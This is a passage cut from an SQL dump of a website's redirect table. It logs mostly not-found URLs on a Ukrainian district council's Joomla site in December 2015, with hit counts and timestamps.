00:00:00',301),(19979,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=206:2010-12-15-14-19-27&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-08 17:58:43','0000-00-00 00:00:00',301),(19980,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=678:----------------2012-2014-&catid=42:--16052012-&Itemid=80&lang=uk','','','',2,0,'2015-12-08 21:03:44','0000-00-00 00:00:00',301),(19981,'http://www.malyn-rayrada.org.ua/index.php?Itemid=93&id=52&lang=uk&layout=blog&option=com_content&view=category','','','',3,0,'2015-12-08 22:30:35','0000-00-00 00:00:00',301),(19982,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=436:------l-r--2007-2011-&catid=37:--21102011-&Itemid=72&lang=uk','','','',1,0,'2015-12-09 02:03:28','0000-00-00 00:00:00',301),(19983,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=908:2013-01-21-08-58-40&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-09 03:10:00','0000-00-00 00:00:00',301),(19984,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=468:-15-2011-120-l-r&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-12-09 03:12:59','0000-00-00 00:00:00',301),(19985,'http://www.malyn-rayrada.org.ua/index.php/387-zaversheno-pidgotovku-do-provedennja-chergovoi_3','','','',22,0,'2015-12-09 05:28:38','0000-00-00 00:00:00',301),(19986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=en&Itemid=0','','','',1,0,'2015-12-09 05:45:24','0000-00-00 00:00:00',301),(19987,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&id=40:--28032012-&lang=uk&layout=blog&option=com_content&view=category','','http://go.mail.ru/search?q=%D0%BC%D0%B0%D0%BB%D0%B8%D0%BD%D1%81%D1%8C%D0%BA%D0%B0%D1%80%D0%B0%D0%B9%D0%BE%D0%BD%D0%BD%D0%B0&gp=789110&frc=789110','',4,0,'2015-12-09 06:34:17','0000-00-00 00:00:00',301),(19988,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=948:--------------2012-&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-09 09:09:09','0000-00-00 00:00:00',301),(19989,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/694-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_16','','','',14,0,'2015-12-09 12:23:10','0000-00-00 00:00:00',301),(19990,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=450:-l-2011-2013-r&catid=38&Itemid=73&lang=ru','','','',2,0,'2015-12-09 12:37:37','0000-00-00 00:00:00',301),(19991,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=317:-l-2008-2012-r&catid=33:-20052011&Itemid=66&lang=en','','','',1,0,'2015-12-09 14:39:37','0000-00-00 00:00:00',301),(19992,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=680:2012-05-17-10-02-41&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-09 18:17:15','0000-00-00 00:00:00',301),(19993,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=ru','','','',5,0,'2015-12-09 20:36:02','0000-00-00 00:00:00',301),(19995,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?start=15','','','',6,0,'2015-12-09 21:14:57','0000-00-00 00:00:00',301),(19996,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/242-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_2','','','',7,0,'2015-12-09 21:29:22','0000-00-00 00:00:00',301),(19997,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=en','','','',5,0,'2015-12-09 22:35:12','0000-00-00 00:00:00',301),(19998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=503:-2017-&catid=38&Itemid=73&lang=uk','','','',2,0,'2015-12-10 01:05:16','0000-00-00 00:00:00',301),(19999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=504:-2012-&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-12-10 01:05:16','0000-00-00 00:00:00',301),(20000,'http://www.malyn-rayrada.org.ua/index.php/1092-ogoloshennya-malinskoji-rajonnoji-blagodijnoji-organizatsiji-zakhist-ditej-chornobilya-shchodo-vidpochinku?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-10 01:06:16','0000-00-00 00:00:00',301),(20001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=en&limitstart=10','','','',1,0,'2015-12-10 01:06:41','0000-00-00 00:00:00',301),(20002,'http://www.malyn-rayrada.org.ua/index.php/1073-15-kvitnya-blagodijnij-kontsert-v-rbk?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-10 01:06:44','0000-00-00 00:00:00',301),(20003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=483:-2012-2016-&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-12-10 01:08:25','0000-00-00 00:00:00',301),(20004,'http://www.malyn-rayrada.org.ua/index.php/1082-pro-sklikannya-39-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-10 01:09:23','0000-00-00 00:00:00',301),(20005,'http://www.malyn-rayrada.org.ua/index.php/1099-vidbulas-39-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-10 01:09:24','0000-00-00 00:00:00',301),(20006,'http://www.malyn-rayrada.org.ua/admin','','','',1,0,'2015-12-10 01:56:53','0000-00-00 00:00:00',301),(20007,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47&layout=blog&Itemid=86&lang=uk','','','',3,0,'2015-12-10 03:33:52','0000-00-00 00:00:00',301),(20008,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=en','','','',5,0,'2015-12-10 04:04:06','0000-00-00 00:00:00',301),(20009,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=488:2011-12-02-06-34-46&catid=38&Itemid=73&lang=uk','','','',13,0,'2015-12-10 06:37:27','0000-00-00 00:00:00',301),(20010,'http://malyn-rayrada.org.ua/index.php/1037-pishov-iz-zhittya-tsvik-s-m','','','',9,0,'2015-12-10 10:46:44','0000-00-00 00:00:00',301),(20011,'http://malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa','','','',2,0,'2015-12-10 10:46:49','0000-00-00 00:00:00',301),(20012,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=711:2012-06-14-15-09-26&catid=43:--25072012-&Itemid=82&lang=en','','','',1,0,'2015-12-10 11:16:00','0000-00-00 00:00:00',301),(20013,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1069-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-chopovitskoji-selishchnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-10 13:05:26','0000-00-00 00:00:00',301),(20014,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1079-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-dibrivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-10 13:05:29','0000-00-00 00:00:00',301),(20015,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1188-pro-vnesennya-zmin-do-strukturi-vikonavchogo-aparatu-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-10 13:05:32','0000-00-00 00:00:00',301),(20016,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=643:-6-&Itemid=80&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 13:39:21','0000-00-00 00:00:00',301),(20017,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=636:-2011-2015-&Itemid=80&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 13:39:42','0000-00-00 00:00:00',301),(20018,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1324:2014-05-27-13-24-07&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-10 13:39:46','0000-00-00 00:00:00',301),(20019,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1295:-2014-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-10 13:59:08','0000-00-00 00:00:00',301),(20020,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=318:-2007-2011&catid=33&Itemid=66&lang=uk','','','',2,0,'2015-12-10 14:00:09','0000-00-00 00:00:00',301),(20021,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=204:2010-12-15-14-13-07&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 14:07:34','0000-00-00 00:00:00',301),(20022,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=627:2012-04-02-15-57-23&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 14:32:24','0000-00-00 00:00:00',301),(20023,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=639:2012-04-03-12-41-18&Itemid=80&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 14:39:24','0000-00-00 00:00:00',301),(20024,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=588:2012-02-27-13-48-51&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 14:41:43','0000-00-00 00:00:00',301),(20025,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1328:2014-06-01-11-58-56&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-10 14:44:56','0000-00-00 00:00:00',301),(20026,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=767:2012-10-01-08-20-30&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 14:47:39','0000-00-00 00:00:00',301),(20027,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=758:--15---&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 14:48:55','0000-00-00 00:00:00',301),(20028,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1349:-31-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 14:49:04','0000-00-00 00:00:00',301),(20029,'http://www.malyn-rayrada.org.ua/index.php?catid=35&id=359:2011-06-30-11-10-42&Itemid=69&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 14:51:29','0000-00-00 00:00:00',301),(20030,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=948:-2012-&Itemid=88&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 14:53:38','0000-00-00 00:00:00',301),(20031,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1211:-2014-&Itemid=97&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-10 14:59:14','0000-00-00 00:00:00',301),(20032,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=907:2013-01-21-08-54-59&Itemid=86&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-10 15:05:35','0000-00-00 00:00:00',301),(20033,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=321:------------l---------r--2011-2016-&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 15:07:10','0000-00-00 00:00:00',301),(20034,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=998:1&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 15:09:32','0000-00-00 00:00:00',301),(20035,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1097:2013-09-25-08-35-50&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 15:10:53','0000-00-00 00:00:00',301),(20036,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=981:2013-04-03-07-23-01&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 15:11:58','0000-00-00 00:00:00',301),(20037,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=875:-2013-&Itemid=70&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-10 15:13:14','0000-00-00 00:00:00',301),(20038,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=999:2013-04-28-05-21-05&Itemid=0&lang=en&option=com_content&view=article','','','',3,0,'2015-12-10 15:14:34','0000-00-00 00:00:00',301),(20039,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=597:-l-r-2011-&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-10 15:16:27','0000-00-00 00:00:00',301),(20040,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1143:2013-11-26-13-23-37&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-10 15:18:56','0000-00-00 00:00:00',301),(20041,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=566:6-2012-&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 15:21:12','0000-00-00 00:00:00',301),(20042,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=472:-l-r-&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 15:30:31','0000-00-00 00:00:00',301),(20043,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=506:-lr&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 16:09:55','0000-00-00 00:00:00',301),(20044,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=608:2012-03-15-08-40-03&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 16:12:50','0000-00-00 00:00:00',301),(20045,'http://www.malyn-rayrada.org.ua/index.php?catid=2&id=7:2010-06-05-14-44-23&Itemid=5&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 16:17:14','0000-00-00 00:00:00',301),(20046,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=566:6-2012-&lang=en&option=com_content&view=article','','','',4,0,'2015-12-10 16:20:06','0000-00-00 00:00:00',301),(20047,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=692:-2012&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-10 16:23:37','0000-00-00 00:00:00',301),(20048,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1000:1&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 16:31:27','0000-00-00 00:00:00',301),(20049,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=325:2011-05-20-16-14-21&Itemid=66&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-10 16:39:12','0000-00-00 00:00:00',301),(20050,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=884:2012-12-24-10-46-13&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 16:42:26','0000-00-00 00:00:00',301),(20051,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=437:-----l-r--2012-2015-&Itemid=72&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 16:57:00','0000-00-00 00:00:00',301),(20052,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=864:-qq&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 17:02:01','0000-00-00 00:00:00',301),(20053,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=475:2011-11-22-07-58-34&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 17:05:22','0000-00-00 00:00:00',301),(20054,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=995:-2012-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 17:11:15','0000-00-00 00:00:00',301),(20055,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=514:2011-12-22-10-03-07&catid=38:--19122011-&Itemid=73&lang=ru','','','',4,0,'2015-12-10 17:12:39','0000-00-00 00:00:00',301),(20056,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=610:2012-03-23-06-34-31&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 17:16:17','0000-00-00 00:00:00',301),(20057,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1084:-qq&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 17:17:59','0000-00-00 00:00:00',301),(20058,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1070:2013-08-23-04-27-00&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 17:18:25','0000-00-00 00:00:00',301),(20059,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=520:-2012-2013-&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 17:18:54','0000-00-00 00:00:00',301),(20060,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=851:-2013-&Itemid=85&lang=en&option=com_content&view=article','','','',3,0,'2015-12-10 17:22:37','0000-00-00 00:00:00',301),(20061,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=884:2012-12-24-10-46-13&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 17:35:15','0000-00-00 00:00:00',301),(20062,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=736:2012-07-18-13-34-35&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 17:37:28','0000-00-00 00:00:00',301),(20063,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1192:-2014-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 17:39:54','0000-00-00 00:00:00',301),(20064,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=862:-qq&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 17:42:38','0000-00-00 00:00:00',301),(20065,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1164:2013-12-29-11-46-36&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 17:45:07','0000-00-00 00:00:00',301),(20066,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1179:2014-01-21-12-44-04&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 17:47:40','0000-00-00 00:00:00',301),(20067,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1333:2014-06-05-13-09-03&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 18:04:59','0000-00-00 00:00:00',301),(20068,'http://www.malyn-rayrada.org.ua/index.php?id=56:--03022014-&Itemid=97&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-10 18:08:50','0000-00-00 00:00:00',301),(20069,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=552:2012-01-26-12-47-12&Itemid=76&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 18:11:14','0000-00-00 00:00:00',301),(20070,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=763:2012-09-24-07-57-43&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 18:18:01','0000-00-00 00:00:00',301),(20071,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=599:-l-r-2011-2016-&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 18:19:49','0000-00-00 00:00:00',301),(20072,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1212:2014-02-07-07-01-38&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 18:20:54','0000-00-00 00:00:00',301),(20073,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1072:-24-6-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 18:21:11','0000-00-00 00:00:00',301),(20074,'http://www.malyn-rayrada.org.ua/index.php?catid=27:---1932-33-&id=142:2010-10-15-06-19-49&Itemid=58&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-10 18:22:59','0000-00-00 00:00:00',301),(20075,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=614:2012-03-26-16-06-35&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 18:24:58','0000-00-00 00:00:00',301),(20076,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=936:2013-02-21-09-43-43&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 18:27:33','0000-00-00 00:00:00',301),(20077,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1109:2013-10-18-10-25-30&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 18:30:11','0000-00-00 00:00:00',301),(20078,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1125:2013-10-31-07-20-16&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 18:37:42','0000-00-00 00:00:00',301),(20079,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=820:2012-11-14-16-42-11&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 18:40:21','0000-00-00 00:00:00',301),(20080,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1166:2014-01-06-08-21-04&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 18:42:34','0000-00-00 00:00:00',301),(20081,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=820:2012-11-14-16-42-11&Itemid=84&lang=en&option=com_content&view=article','','','',3,0,'2015-12-10 18:47:15','0000-00-00 00:00:00',301),(20082,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=542:-2011-&Itemid=76&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 18:54:55','0000-00-00 00:00:00',301),(20083,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=713:2012-06-14-15-13-57&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 18:57:56','0000-00-00 00:00:00',301),(20084,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 19:01:07','0000-00-00 00:00:00',301),(20085,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=311:-v-&Itemid=66&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 19:05:33','0000-00-00 00:00:00',301),(20086,'http://www.malyn-rayrada.org.ua/index.php?catid=32&id=642:2012-04-03-12-53-05&Itemid=64&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 19:06:02','0000-00-00 00:00:00',301),(20087,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=451:------------2011--2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 19:06:27','0000-00-00 00:00:00',301),(20088,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=412:-165-&Itemid=72&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 19:07:19','0000-00-00 00:00:00',301),(20089,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=562:-19122011194-30122011202&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 19:08:25','0000-00-00 00:00:00',301),(20090,'http://www.malyn-rayrada.org.ua/index.php?catid=21:2010-06-07-09-43-24&id=27:2010-06-07-11-05-24&Itemid=47&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 19:09:15','0000-00-00 00:00:00',301),(20091,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 19:09:38','0000-00-00 00:00:00',301),(20092,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=820:2012-11-14-16-42-11&Itemid=84&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 19:11:13','0000-00-00 00:00:00',301),(20093,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1052:2013-07-19-11-32-33&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 19:12:14','0000-00-00 00:00:00',301),(20094,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=805:2012-10-30-13-35-53&Itemid=&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-10 19:18:24','0000-00-00 00:00:00',301),(20095,'http://malyn-rayrada.org.ua/forums/bigdump.php','','','',1,0,'2015-12-10 19:19:47','0000-00-00 00:00:00',301),(20096,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1073:2013-08-30-11-12-19&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 19:20:42','0000-00-00 00:00:00',301),(20097,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=929:2013-02-21-09-11-26&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 19:29:50','0000-00-00 00:00:00',301),(20098,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1205:2014-01-31-07-53-03&Itemid=97&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 19:31:47','0000-00-00 00:00:00',301),(20099,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=279:2011-03-31-08-20-23&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 19:38:58','0000-00-00 00:00:00',301),(20100,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=198:------------2006-2010-r&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 19:40:47','0000-00-00 00:00:00',301),(20101,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=317:-l-2008-2012-r&Itemid=66&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 19:42:41','0000-00-00 00:00:00',301),(20102,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=671:2012-05-09-13-09-05&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 20:00:01','0000-00-00 00:00:00',301),(20103,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=659:-2011-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 20:06:03','0000-00-00 00:00:00',301),(20104,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=610:2012-03-23-06-34-31&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-10 20:06:34','0000-00-00 00:00:00',301),(20105,'http://www.malyn-rayrada.org.ua/index.php?catid=31:-25032011&id=276:---4-----6--25032011-&Itemid=62&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 20:07:25','0000-00-00 00:00:00',301),(20106,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=503:-2017-&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 20:10:18','0000-00-00 00:00:00',301),(20107,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=712:2012-06-14-15-11-24&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 20:11:55','0000-00-00 00:00:00',301),(20108,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1214:2014-02-18-09-51-45&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 20:19:44','0000-00-00 00:00:00',301),(20109,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=581:2012-02-27-13-13-19&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 20:21:09','0000-00-00 00:00:00',301),(20110,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=605:-l-r-i-iii-&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-10 20:22:46','0000-00-00 00:00:00',301),(20111,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=452:-----------20--2011--100-l--r-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 20:28:37','0000-00-00 00:00:00',301),(20112,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1154:7-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 20:30:01','0000-00-00 00:00:00',301),(20113,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=987:2013-04-15-06-06-41&Itemid=88&lang=en&option=com_content&view=article','','','',2,0,'2015-12-10 20:31:05','0000-00-00 00:00:00',301),(20114,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=646:2012-04-08-07-58-55&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-10 20:32:14','0000-00-00 00:00:00',301),(20115,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=610:2012-03-23-06-34-31&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-10 20:36:34','0000-00-00 00:00:00',301),(20116,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=608:2012-03-15-08-40-03&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-10 20:39:38','0000-00-00 00:00:00',301),(20117,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=940:2013-02-21-14-02-14&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-10 